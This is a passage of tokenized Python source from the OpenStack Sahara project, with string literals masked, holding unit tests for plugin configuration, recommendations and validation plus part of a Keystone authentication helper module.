HadoopProvisionError , <EOL> client . wait_ambari_request , "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> from oslo_serialization import jsonutils as json <EOL> from sahara . plugins . cdh . v5_4_0 import config_helper <EOL> from sahara . tests . unit import base <EOL> from sahara . tests . unit . plugins . cdh import utils as ctu <EOL> from sahara . utils import files as f <EOL> c_h = config_helper . ConfigHelperV540 ( ) <EOL> path_to_config = '<STR_LIT>' <EOL> json_files = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> class ConfigHelperTestCase ( base . SaharaTestCase ) : <EOL> def test_get_ng_plugin_configs ( self ) : <EOL> actual_configs = c_h . _get_ng_plugin_configs ( ) <EOL> expected_configs = [ ] <EOL> for json_file in json_files : <EOL> expected_configs += json . loads ( <EOL> f . get_file_text ( path_to_config + json_file ) ) <EOL> expected_names = set ( i [ '<STR_LIT:name>' ] for i in expected_configs ) <EOL> actual_names = set ( i . to_dict ( ) [ '<STR_LIT:name>' ] for i in actual_configs ) <EOL> self . assertEqual ( expected_names , actual_names ) <EOL> def test_get_cdh5_repo_url ( self ) : <EOL> cluster = ctu . get_fake_cluster ( cluster_configs = { } ) <EOL> self . assertEqual ( c_h . CDH5_REPO_URL . default_value , <EOL> c_h . get_cdh5_repo_url ( cluster ) ) <EOL> cluster = ctu . get_fake_cluster ( <EOL> cluster_configs = { '<STR_LIT>' : { c_h . CDH5_REPO_URL . name : '<STR_LIT>' } } ) <EOL> self . assertEqual ( '<STR_LIT>' , c_h . get_cdh5_repo_url ( cluster ) ) <EOL> def test_get_cdh5_key_url ( self ) : <EOL> cluster = ctu . get_fake_cluster ( cluster_configs = { } ) <EOL> self . assertEqual ( c_h . CDH5_REPO_KEY_URL . default_value , <EOL> c_h . get_cdh5_key_url ( cluster ) ) <EOL> cluster = ctu . get_fake_cluster ( <EOL> cluster_configs = { '<STR_LIT>' : { c_h . CDH5_REPO_KEY_URL . name : '<STR_LIT>' } } ) <EOL> self . assertEqual ( '<STR_LIT>' , c_h . get_cdh5_key_url ( cluster ) ) <EOL> def test_get_cm5_repo_url ( self ) : <EOL> cluster = ctu . get_fake_cluster ( cluster_configs = { } ) <EOL> self . assertEqual ( c_h . CM5_REPO_URL . default_value , <EOL> c_h . get_cm5_repo_url ( cluster ) ) <EOL> cluster = ctu . get_fake_cluster ( <EOL> cluster_configs = { '<STR_LIT>' : { c_h . CM5_REPO_URL . name : '<STR_LIT>' } } ) <EOL> self . assertEqual ( '<STR_LIT>' , c_h . get_cm5_repo_url ( cluster ) ) <EOL> def test_get_cm5_key_url ( self ) : <EOL> cluster = ctu . get_fake_cluster ( cluster_configs = { } ) <EOL> self . assertEqual ( c_h . CM5_REPO_KEY_URL . default_value , <EOL> c_h . get_cm5_key_url ( cluster ) ) <EOL> cluster = ctu . get_fake_cluster ( <EOL> cluster_configs = { '<STR_LIT>' : { c_h . CM5_REPO_KEY_URL . name : '<STR_LIT>' } } ) <EOL> self . assertEqual ( '<STR_LIT>' , c_h . get_cm5_key_url ( cluster ) ) <EOL> def test_is_swift_enabled ( self ) : <EOL> cluster = ctu . get_fake_cluster ( cluster_configs = { } ) <EOL> self . assertTrue ( c_h . is_swift_enabled ( cluster ) ) <EOL> cluster = ctu . get_fake_cluster ( <EOL> cluster_configs = { '<STR_LIT>' : { c_h . ENABLE_SWIFT . name : False } } ) <EOL> self . assertFalse ( c_h . is_swift_enabled ( cluster ) ) <EOL> def test_get_swift_lib_url ( self ) : <EOL> cluster = ctu . get_fake_cluster ( cluster_configs = { } ) <EOL> self . assertEqual ( c_h . DEFAULT_SWIFT_LIB_URL , <EOL> c_h . get_swift_lib_url ( cluster ) ) <EOL> cluster = ctu . get_fake_cluster ( <EOL> cluster_configs = { '<STR_LIT>' : { c_h . SWIFT_LIB_URL . name : '<STR_LIT>' } } ) <EOL> self . assertEqual ( '<STR_LIT>' , c_h . get_swift_lib_url ( cluster ) ) <EOL> def test_is_hbase_common_lib_enabled ( self ) : <EOL> cluster = ctu . get_fake_cluster ( cluster_configs = { } ) <EOL> self . assertTrue ( c_h . is_hbase_common_lib_enabled ( cluster ) ) <EOL> cluster = ctu . get_fake_cluster ( <EOL> cluster_configs = { '<STR_LIT>' : <EOL> { c_h . ENABLE_HBASE_COMMON_LIB . name : False } } ) <EOL> self . assertFalse ( c_h . is_hbase_common_lib_enabled ( cluster ) ) <EOL> def test_get_extjs_lib_url ( self ) : <EOL> cluster = ctu . get_fake_cluster ( cluster_configs = { } ) <EOL> self . assertEqual ( c_h . DEFAULT_EXTJS_LIB_URL , <EOL> c_h . get_extjs_lib_url ( cluster ) ) <EOL> cluster = ctu . get_fake_cluster ( <EOL> cluster_configs = { '<STR_LIT>' : { c_h . EXTJS_LIB_URL . name : '<STR_LIT>' } } ) <EOL> self . assertEqual ( '<STR_LIT>' , c_h . get_extjs_lib_url ( cluster ) ) <EOL> def test_get_kms_key_url ( self ) : <EOL> cluster = ctu . get_fake_cluster ( cluster_configs = { } ) <EOL> self . assertEqual ( c_h . KMS_REPO_KEY_URL . default_value , <EOL> c_h . get_kms_key_url ( cluster ) ) <EOL> cluster = ctu . get_fake_cluster ( <EOL> cluster_configs = { '<STR_LIT>' : { c_h . KMS_REPO_KEY_URL . name : '<STR_LIT>' } } ) <EOL> self . assertEqual ( '<STR_LIT>' , c_h . get_kms_key_url ( cluster ) ) </s>
<s> import mock <EOL> import six <EOL> from sahara import conductor as cond <EOL> from sahara import context <EOL> from sahara . plugins import recommendations_utils as ru <EOL> from sahara . tests . unit import base as b <EOL> conductor = cond . API <EOL> class Configs ( object ) : <EOL> def __init__ ( self , configs ) : <EOL> self . configs = configs <EOL> def to_dict ( self ) : <EOL> return self . configs <EOL> class FakeObject ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> for attr in six . iterkeys ( kwargs ) : <EOL> setattr ( self , attr , kwargs . get ( attr ) ) <EOL> class TestProvidingRecommendations ( b . SaharaWithDbTestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_recommended_node_configs_medium_flavor ( <EOL> self , fake_flavor ) : <EOL> ng = FakeObject ( flavor_id = "<STR_LIT>" , node_configs = Configs ( { } ) ) <EOL> cl = FakeObject ( cluster_configs = Configs ( { } ) ) <EOL> fake_flavor . return_value = FakeObject ( ram = <NUM_LIT> , vcpus = <NUM_LIT:2> ) <EOL> observed = ru . HadoopAutoConfigsProvider ( <EOL> { } , [ ] , cl , False ) . _get_recommended_node_configs ( ng ) <EOL> self . assertEqual ( { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT:false>' <EOL> } , observed ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_recommended_node_configs_small_flavor ( <EOL> self , fake_flavor ) : <EOL> ng = FakeObject ( flavor_id = "<STR_LIT>" , node_configs = Configs ( { } ) ) <EOL> cl = FakeObject ( cluster_configs = Configs ( { } ) ) <EOL> fake_flavor . return_value = FakeObject ( ram = <NUM_LIT> , vcpus = <NUM_LIT:1> ) <EOL> observed = ru . HadoopAutoConfigsProvider ( <EOL> { '<STR_LIT>' : { } , '<STR_LIT>' : { } } , [ ] , cl , False , <EOL> ) . _get_recommended_node_configs ( ng ) <EOL> self . assertEqual ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT:false>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , observed ) <EOL> def test_merge_configs ( self ) : <EOL> provider = ru . HadoopAutoConfigsProvider ( { } , None , None , False ) <EOL> initial_configs = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> extra_configs = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> expected = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> self . assertEqual ( <EOL> expected , provider . _merge_configs ( initial_configs , extra_configs ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def test_apply_recommended_configs ( self , cond_cluster , cond_node_group , <EOL> fake_flavor ) : <EOL> class TestProvider ( ru . HadoopAutoConfigsProvider ) : <EOL> def get_datanode_name ( self ) : <EOL> return "<STR_LIT>" <EOL> fake_flavor . return_value = FakeObject ( ram = <NUM_LIT> , vcpus = <NUM_LIT:1> ) <EOL> to_tune = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> } <EOL> } <EOL> fake_plugin_configs = [ <EOL> FakeObject ( applicable_target = '<STR_LIT>' , name = '<STR_LIT>' , <EOL> default_value = <NUM_LIT:3> ) ] <EOL> fake_ng = FakeObject ( <EOL> use_autoconfig = True , <EOL> count = <NUM_LIT:2> , <EOL> node_processes = [ '<STR_LIT>' ] , <EOL> flavor_id = '<STR_LIT>' , <EOL> node_configs = Configs ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } <EOL> } ) <EOL> ) <EOL> fake_cluster = FakeObject ( <EOL> cluster_configs = Configs ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } ) , <EOL> node_groups = [ fake_ng ] , <EOL> use_autoconfig = True , <EOL> extra = Configs ( { } ) <EOL> ) <EOL> v = TestProvider ( <EOL> to_tune , fake_plugin_configs , fake_cluster , False ) <EOL> v . apply_recommended_configs ( ) <EOL> self . assertEqual ( [ mock . call ( context . ctx ( ) , fake_cluster , { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT:2> <EOL> } <EOL> } <EOL> } ) , mock . call ( <EOL> context . ctx ( ) , fake_cluster , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } ) ] , <EOL> cond_cluster . call_args_list ) <EOL> self . assertEqual ( [ mock . call ( context . ctx ( ) , fake_ng , { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> <EOL> } <EOL> } <EOL> } ) ] , cond_node_group . call_args_list ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def test_apply_recommended_configs_no_updates ( <EOL> self , cond_cluster , cond_node_group , fake_flavor ) : <EOL> fake_flavor . return_value = FakeObject ( ram = <NUM_LIT> , vcpus = <NUM_LIT:1> ) <EOL> to_tune = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> } <EOL> } <EOL> fake_plugin_configs = [ <EOL> FakeObject ( applicable_target = '<STR_LIT>' , name = '<STR_LIT>' , <EOL> default_value = <NUM_LIT:3> ) ] <EOL> fake_ng = FakeObject ( <EOL> use_autoconfig = True , <EOL> count = <NUM_LIT:2> , <EOL> node_processes = [ '<STR_LIT>' ] , <EOL> flavor_id = '<STR_LIT>' , <EOL> node_configs = Configs ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } ) <EOL> ) <EOL> fake_cluster = FakeObject ( <EOL> cluster_configs = Configs ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } <EOL> } ) , <EOL> node_groups = [ fake_ng ] , <EOL> use_autoconfig = True , <EOL> extra = Configs ( { } ) <EOL> ) <EOL> v = ru . HadoopAutoConfigsProvider ( <EOL> to_tune , fake_plugin_configs , fake_cluster , False ) <EOL> v . apply_recommended_configs ( ) <EOL> self . assertEqual ( <NUM_LIT:0> , cond_node_group . call_count ) <EOL> self . assertEqual ( <EOL> [ mock . call ( context . ctx ( ) , fake_cluster , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } ) ] , <EOL> cond_cluster . call_args_list ) <EOL> def test_correct_use_autoconfig_value ( self ) : <EOL> ctx = context . ctx ( ) <EOL> ngt1 = conductor . node_group_template_create ( ctx , { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' <EOL> } ) <EOL> ngt2 = conductor . node_group_template_create ( ctx , { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : False <EOL> } ) <EOL> self . assertTrue ( ngt1 . use_autoconfig ) <EOL> self . assertFalse ( ngt2 . use_autoconfig ) <EOL> clt = conductor . cluster_template_create ( ctx , { <EOL> '<STR_LIT:name>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:count>' : <NUM_LIT:3> , <EOL> "<STR_LIT>" : ngt1 . id <EOL> } , <EOL> { <EOL> '<STR_LIT:count>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : ngt2 . id <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : False <EOL> } ) <EOL> cluster = conductor . cluster_create ( ctx , { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : clt . id <EOL> } ) <EOL> self . assertFalse ( cluster . use_autoconfig ) <EOL> for ng in cluster . node_groups : <EOL> if ng . name == '<STR_LIT>' : <EOL> self . assertTrue ( ng . use_autoconfig ) <EOL> else : <EOL> self . assertFalse ( ng . use_autoconfig ) <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def test_not_autonconfigured ( self , cluster_update ) : <EOL> fake_cluster = FakeObject ( extra = Configs ( { } ) ) <EOL> v = ru . HadoopAutoConfigsProvider ( { } , [ ] , fake_cluster , True ) <EOL> v . apply_recommended_configs ( ) <EOL> self . assertEqual ( <NUM_LIT:0> , cluster_update . call_count ) </s>
<s> import testtools <EOL> from sahara . service . edp . oozie . workflow_creator import workflow_factory as w_f <EOL> from sahara . utils import edp <EOL> class TestJobPossibleConfigs ( testtools . TestCase ) : <EOL> def test_possible_configs ( self ) : <EOL> res = w_f . get_possible_job_config ( edp . JOB_TYPE_MAPREDUCE ) <EOL> sample_config_property = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:value>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> } <EOL> self . assertIn ( sample_config_property , res [ '<STR_LIT>' ] [ "<STR_LIT>" ] ) <EOL> res = w_f . get_possible_job_config ( edp . JOB_TYPE_HIVE ) <EOL> sample_config_property = { <EOL> "<STR_LIT:description>" : "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:value>" : "<STR_LIT>" <EOL> } <EOL> self . assertIn ( sample_config_property , res [ "<STR_LIT>" ] [ '<STR_LIT>' ] ) <EOL> res = w_f . get_possible_job_config ( "<STR_LIT>" ) <EOL> self . assertIsNone ( res ) </s>
<s> import copy <EOL> import mock <EOL> from sahara . service . api import v10 as api <EOL> from sahara . service . validations import cluster_template_schema as ct_schema <EOL> from sahara . tests . unit . service . validation import utils as u <EOL> SAMPLE_DATA = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> class TestClusterTemplateUpdateValidation ( u . ValidationTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestClusterTemplateUpdateValidation , self ) . setUp ( ) <EOL> self . _create_object_fun = mock . Mock ( ) <EOL> self . scheme = ct_schema . CLUSTER_TEMPLATE_UPDATE_SCHEMA <EOL> api . plugin_base . setup_plugins ( ) <EOL> def test_cluster_template_update_nothing_required ( self ) : <EOL> self . _assert_create_object_validation ( <EOL> data = { } <EOL> ) <EOL> def test_cluster_template_update_schema ( self ) : <EOL> create = copy . copy ( ct_schema . CLUSTER_TEMPLATE_SCHEMA ) <EOL> update = copy . copy ( ct_schema . CLUSTER_TEMPLATE_UPDATE_SCHEMA ) <EOL> self . assertEqual ( [ ] , update [ "<STR_LIT>" ] ) <EOL> del update [ "<STR_LIT>" ] <EOL> del create [ "<STR_LIT>" ] <EOL> self . assertEqual ( create , update ) <EOL> def test_cluster_template_update ( self ) : <EOL> self . _assert_create_object_validation ( <EOL> data = SAMPLE_DATA <EOL> ) <EOL> extra = copy . copy ( SAMPLE_DATA ) <EOL> extra [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . _assert_create_object_validation ( <EOL> data = extra , <EOL> bad_req_i = ( <NUM_LIT:1> , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ) </s>
<s> import mock <EOL> from sahara . tests . unit import base <EOL> from sahara . utils . openstack import neutron as neutron_client <EOL> class NeutronClientTest ( base . SaharaTestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_get_router ( self , patched , token_auth ) : <EOL> patched . side_effect = _test_get_neutron_client <EOL> neutron = neutron_client . NeutronClient ( <EOL> '<STR_LIT>' , None , None ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> neutron . get_router ( ) ) <EOL> def _test_get_neutron_client ( api_version , * args , ** kwargs ) : <EOL> return FakeNeutronClient ( ) <EOL> class FakeNeutronClient ( object ) : <EOL> def list_routers ( self ) : <EOL> return { "<STR_LIT>" : [ { "<STR_LIT:status>" : "<STR_LIT>" , "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT:id>" : "<STR_LIT>" } ] } <EOL> def list_ports ( self , device_id = None ) : <EOL> return { "<STR_LIT>" : [ <EOL> { "<STR_LIT:status>" : "<STR_LIT>" , "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { "<STR_LIT>" : True } , <EOL> "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : [ <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ] , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:status>" : "<STR_LIT>" , "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { "<STR_LIT>" : True } , <EOL> "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : [ <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ] , <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : "<STR_LIT>" } ] } </s>
<s> from keystoneclient . auth import identity as keystone_identity <EOL> from keystoneclient import session as keystone_session <EOL> from keystoneclient . v2_0 import client as keystone_client <EOL> from keystoneclient . v3 import client as keystone_client_v3 <EOL> from oslo_config import cfg <EOL> from sahara import context <EOL> from sahara . service import sessions <EOL> from sahara . utils . openstack import base <EOL> opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = True , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT:default>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT:default>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ] <EOL> ssl_opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> ] <EOL> keystone_group = cfg . OptGroup ( name = '<STR_LIT>' , <EOL> title = '<STR_LIT>' ) <EOL> CONF = cfg . CONF <EOL> CONF . register_group ( keystone_group ) <EOL> CONF . register_opts ( opts ) <EOL> CONF . register_opts ( ssl_opts , group = keystone_group ) <EOL> def auth ( ) : <EOL> '''<STR_LIT>''' <EOL> ctx = context . current ( ) <EOL> return ctx . auth_plugin or token_auth ( token = context . get_auth_token ( ) , <EOL> project_id = ctx . tenant_id ) <EOL> def auth_for_admin ( project_name = None , trust_id = None ) : <EOL> '''<STR_LIT>''' <EOL> auth = _password_auth ( <EOL> username = CONF . keystone_authtoken . admin_user , <EOL> password = CONF . keystone_authtoken . admin_password , <EOL> project_name = project_name , <EOL> user_domain_name = CONF . admin_user_domain_name , <EOL> project_domain_name = CONF . admin_project_domain_name , <EOL> trust_id = trust_id ) <EOL> return auth <EOL> def auth_for_proxy ( username , password , trust_id = None ) : <EOL> '''<STR_LIT>''' <EOL> auth = _password_auth ( <EOL> username = username , <EOL> password = password , <EOL> user_domain_name = CONF . proxy_user_domain_name , <EOL> trust_id = trust_id ) <EOL> return auth <EOL> def client ( ) : <EOL> '''<STR_LIT>''' <EOL> return client_from_auth ( auth ( ) ) <EOL> def client_for_admin ( ) : <EOL> '''<STR_LIT>''' <EOL> auth = auth_for_admin ( <EOL> project_name = CONF . keystone_authtoken . admin_tenant_name ) <EOL> return client_from_auth ( auth ) <EOL> def client_from_auth ( auth ) : <EOL> '''<STR_LIT>''' <EOL> session = sessions . cache ( ) . get_session ( sessions . SESSION_TYPE_KEYSTONE ) <EOL> if CONF . use_identity_api_v3 : <EOL> client_class = keystone_client_v3 . Client <EOL> else : <EOL> client_class = keystone_client . Client <EOL> return client_class ( session = session , auth = auth ) <EOL> def project_id_from_auth ( auth ) : <EOL> '''<STR_LIT>''' <EOL> return auth . get_project_id ( <EOL> sessions . cache ( ) . get_session ( sessions . SESSION_TYPE_KEYSTONE ) ) <EOL> def service_catalog_from_auth ( auth ) : <EOL> '''<STR_LIT>''' <EOL> if CONF . use_identity_api_v3 : <EOL> return auth . get_access ( <EOL> sessions . cache ( ) . get_session ( ) ) . get ( '<STR_LIT>' , [ ] ) <EOL> else : <EOL> return auth . get_access ( <EOL> sessions . cache ( ) . get_session ( ) ) . get ( '<STR_LIT>' , [ ] ) <EOL> def session_for_admin ( ) : <EOL> '''<STR_LIT>''' <EOL> auth = _password_auth ( <EOL> username = CONF . keystone_authtoken . admin_user , <EOL> password = CONF . keystone_authtoken . admin_password , <EOL> project_name = CONF . keystone_authtoken . admin_tenant_name , <EOL> user_domain_name = CONF . admin_user_domain_name , <EOL> project_domain_name = CONF . admin_project_domain_name ) <EOL> return keystone_session . Session ( auth = auth ) <EOL> def token_auth ( token , project_id = None , project_name = None , <EOL> project_domain_name = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> token_kwargs = dict ( <EOL> auth_url = base . retrieve_auth_url ( CONF . keystone . endpoint_type ) , <EOL> token = token <EOL> ) <EOL> if CONF . use_identity_api_v3 : <EOL> token_kwargs . update ( dict ( <EOL> project_id = project_id , <EOL> project_name = project_name , <EOL> project_domain_name = project_domain_name , <EOL> ) ) <EOL> auth = keystone_identity . v3 . Token ( ** token_kwargs ) <EOL> else : <EOL> token_kwargs . update ( dict ( <EOL> tenant_id = project_id , <EOL> tenant_name = project_name , <EOL> ) ) <EOL> auth = keystone_identity . v2 . Token ( ** token_kwargs ) <EOL> return auth <EOL> def token_from_auth ( auth ) : <EOL> '''<STR_LIT>''' <EOL> return keystone_session . Session ( <EOL> auth = auth , verify = CONF . generic_session_verify ) . get_token ( ) <EOL> def user_id_from_auth ( auth ) : <EOL> '''<STR_LIT>''' <EOL> return auth . get_user_id ( sessions . cache ( ) . get_session ( <EOL> sessions . SESSION_TYPE_KEYSTONE ) ) <EOL> def _client ( username , password = None , token = None , tenant_name = None , <EOL> tenant_id = None , trust_id = None , domain_name = None ) : <EOL> if trust_id and not CONF . use_identity_api_v3 : <EOL> raise Exception ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> auth_url = base . retrieve_auth_url ( <EOL> endpoint_type = CONF . keystone . endpoint_type ) <EOL> client_kwargs = { '<STR_LIT:username>' : username , <EOL> '<STR_LIT:password>' : password , <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT>' : tenant_name , <EOL> '<STR_LIT>' : tenant_id , <EOL> '<STR_LIT>' : trust_id , <EOL> '<STR_LIT>' : domain_name , <EOL> '<STR_LIT>' : auth_url , <EOL> '<STR_LIT>' : CONF . keystone . ca_file , <EOL> '<STR_LIT>' : CONF . keystone . api_insecure <EOL> } <EOL> if CONF . use_identity_api_v3 : <EOL> keystone = keystone_client_v3 . Client ( ** client_kwargs ) <EOL> keystone . management_url = auth_url <EOL> else : <EOL> keystone = keystone_client . Client ( ** client_kwargs ) <EOL> return keystone <EOL> def _password_auth ( username , password , <EOL> project_name = None , user_domain_name = None , <EOL> project_domain_name = None , trust_id = None ) : <EOL> '''<STR_LIT>''' <EOL> passwd_kwargs = dict ( <EOL> auth_url = base . retrieve_auth_url ( CONF . keystone . endpoint_type ) , 